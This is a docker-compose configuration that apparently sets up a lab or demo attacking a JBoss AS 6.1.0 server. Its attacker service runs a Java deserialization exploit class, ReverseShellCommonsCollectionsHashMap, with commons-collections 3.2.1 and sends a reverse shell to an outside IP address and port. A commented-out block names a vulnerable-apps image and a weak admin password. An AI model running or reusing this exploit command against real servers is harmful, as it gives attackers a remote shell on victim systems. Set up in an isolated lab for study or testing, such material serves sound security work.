version: '2.0'

services:
  nest:
    image: h2hc
    build: .
    environment:
      NODE_ENV: development
    depends_on:
      - jboss
    links:
      - jboss
    ## set your startup file here
    command:  java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 45.32.82.186:1234
  jboss:
    image: jboss
    build: ./apps/jboss/as-6.1.0
    ports:
      - "9990:9990"
      - "8080:8080"
  # jboss:
  #   #image: jboss
  #   image: medicean/vulapps:j_jboss_1
  #   #image: tutum/jboss:as7    #compose will pull image ,if it not exist
  #   #build: ./vulapps/jboss
  #   #build: tutum/jboss:as7
  #   environment:
  #     JBOSS_PASS: admin123
  #   ports:
  #     - 8080:8080

